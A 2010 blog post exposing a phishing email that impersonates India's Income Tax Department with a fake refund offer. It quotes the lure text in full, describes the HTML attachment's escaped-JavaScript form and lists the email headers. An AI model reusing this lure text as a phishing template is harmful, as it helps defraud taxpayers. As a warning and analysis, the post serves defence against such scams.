Thursday, February 25, 2010

Phishers targeting Indian Income Tax Payers


Recently I got an email (claiming to be) from refund@incometaxindia.gov.in that went like

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of (INR) 13963.00 .

Please submit the tax refund request and allow us 6-9 days in order to process it.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after the deadline.

To access your tax refund, use the form attached to this email.


Regards,
Department of Revenue,Ministry of Finance,Government of India

It also had an attachment 

Content-Type: application/octet-stream; name=income tax refund request.html
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=income tax refund request.html

Size of attachment was 4 lines, 5 words and 26037 bytes, with newlines being CRLF. The content of this html file was a small Javascript  doing a document.write(unescape('.... a large escaped string ....')), and it showed like attached image, except the following missing line at the bottom of the page in the image.

Note: For security reasons, we recommend that you close your browser after you have finished the refund process.

Here are the headers of the mail.

From: "refund@incometaxindia.gov.in" <refund@incometaxindia.gov.in>
To: undisclosed-recipients:;
Cc:
Subject: Refund income tax department
Date: Wed, 24 Feb 2010 11:48:07 -0500
Return-Path: <refund@incometaxindia.gov.in>
Delivered-To: email-id-blocked
Received: (qmail 16162 invoked by uid 0); 24 Feb 2010 17:00:24 -0000
X-Ob-Received: from unknown (192.168.9.134) by mta45-1.us4.outblaze.com; 24 Feb 2010 17:00:24 -0000
Received: from wernerusa.com (adsl-072-151-071-244.sip.clt.bellsouth.net [72.151.71.244]) by spf5-1.us4.outblaze.com (Postfix) with ESMTP id 7993F63D29 for <email-id-blocked>; Wed, 24 Feb 2010 17:00:23 +0000 (GMT)
Received: from User ([67.227.173.160]) by wernerusa.com with Microsoft SMTPSVC(6.0.3790.3959); Wed, 24 Feb 2010 11:48:10 -0500
Reply-To: <refund@incometaxindia.gov.in>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0105_01C2A9A6.2ADAE3C4"
X-Priority: 3
X-Msmail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-Mimeole: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <NTSERVERFkuutSgcOrB00003500@wernerusa.com>
X-Originalarrivaltime: 24 Feb 2010 16:48:10.0571 (UTC) FILETIME=[25ED21B0:01CAB571]
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 7bit